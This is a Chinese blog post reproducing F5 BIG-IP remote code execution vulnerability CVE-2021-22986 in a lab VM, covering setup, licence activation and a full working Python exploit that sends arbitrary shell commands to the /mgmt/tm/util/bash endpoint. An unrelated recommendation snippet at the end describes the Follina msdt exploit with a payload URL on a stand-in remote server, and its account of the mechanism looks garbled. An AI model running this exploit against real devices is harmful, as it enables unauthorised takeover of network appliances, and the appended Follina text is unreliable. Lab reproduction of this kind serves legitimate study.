F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986 虚拟机上复现

一、在vmware上安装BIGIP-15.1.0

进入F5官方主页:https://support.f5.com/csp/home
点击下载按钮(如下图所示)
在这里插入图片描述
进入页面后,我们选择v15.X版本
在这里插入图片描述
选择15.1.0长期维护版本
在这里插入图片描述
在这里,我们选择虚拟化版本
在这里插入图片描述
点击我接受按钮
在这里插入图片描述
选择第一个下载
在这里插入图片描述
下载完成之后,我们将下载下来的ova文件拖动到虚拟机当中,即可完成虚拟机的安装
在这里插入图片描述

二、BIGIP虚拟机的初始使用

虚拟机登陆
虚拟机装好后 默认的用户名是 root,密码是default.
个别用户登陆后,会强制要求更换密码。这里更换的密码不能是一些常用的字符组合(比如单词)否则很容易不通过。如果您失败了几次,不妨尝试类似于f8fa7g4k3k69o这样的密码。
远程web登陆
虚拟机root登陆成功后,通过ifconfig命令获取ip地址(虚拟机要桥接模式哦),假设这里获取的ip为10.0.0.166, 那么在host主机访问这个网址,进入web配置页面
在这里插入图片描述
在这里插入图片描述
web远程登陆的用户名和密码都是admin,但是我在登陆的时候密码始终不对,最后,我只好重置这个密码(如下图,输入两遍新密码)
在这里插入图片描述
终于,在重置密码后,我web远程登陆成功了

license激活
接下来,我们点击license按钮(我这里是激活过的)
在这里插入图片描述
如果不是已激活的状态,需要进入官网:(http://www.f5.com/trial)来获取激活码
流程如图所示,选择红色框框选中的按钮
在这里插入图片描述
点击Get started按钮
在这里插入图片描述
填写你的申请信息(官网要登陆哦)
在这里插入图片描述
稍后,会在半个小时内,将激活码发送到您的邮箱里面(邮箱是官网账号注册时留的邮箱)
我们收到激活码后填写到下面的Base Registration Key栏中,然后选择Automatic模式进行激活(因为本人激活过了,所以下图是在网上找的,网上的那个人选择的是第二个,这里我实际操作选择的是第一个)
在这里插入图片描述
然后点击Next按钮,如果出现下一步或者我接受之类的按钮一律点击即可
之后一般会自动跳转到如下图所示的界面,这就代表激活成功了
在这里插入图片描述

三、远程代码执行命令

执行代码

import requests
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def attack(target_url, command="pwd"):
    command = f"\'{command}\'"
    check_url = target_url + '/mgmt/tm/util/bash'
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
        'Content-Type': 'application/json',
        'X-F5-Auth-Token': '',
        'Authorization': 'Basic YWRtaW46QVNhc1M='
    }
    data = {'command': "run",'utilCmdArgs':f"-c {command}"}
    try:
        response = requests.post(url=check_url, json=data, headers=headers, verify=False, timeout=5)
        if response.status_code == 200 and 'commandResult' in response.text:
            print(" {} 存在漏洞".format(target_url))
            attack_result = json.loads(response.text.replace('\\n', '\\t')).get('commandResult', None)
            return attack_result
        else:
            print("{} 不存在漏洞".format(target_url))
    except Exception as e:
        print('url 访问异常 {}'.format(target_url))


def format_url(url):
    try:
        if url[:4] != "http":
            url = "https://" + url
            url = url.strip()
        return url
    except Exception as e:
        print('URL 错误 {}'.format(url))



if __name__ == '__main__':
    # 你的虚拟机ip地址
    ip = "your ip"
    # 执行的命令
    command = "ls"
    url = format_url(ip)
    # 输出返回结果
    print(attack(url, command))
上面的代码用户使用的时候,只需要将ip 改成您虚拟机的ip即可,其余无需改变

执行结果展示

  1. 查看当前路径
    在这里插入图片描述
  2. 查看当前路径下的文件
    在这里插入图片描述
    3.创建一个目录
    在这里插入图片描述
    到虚拟机中,我们查看目录是否创建成功

在这里插入图片描述
可以看到目录创建成功

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值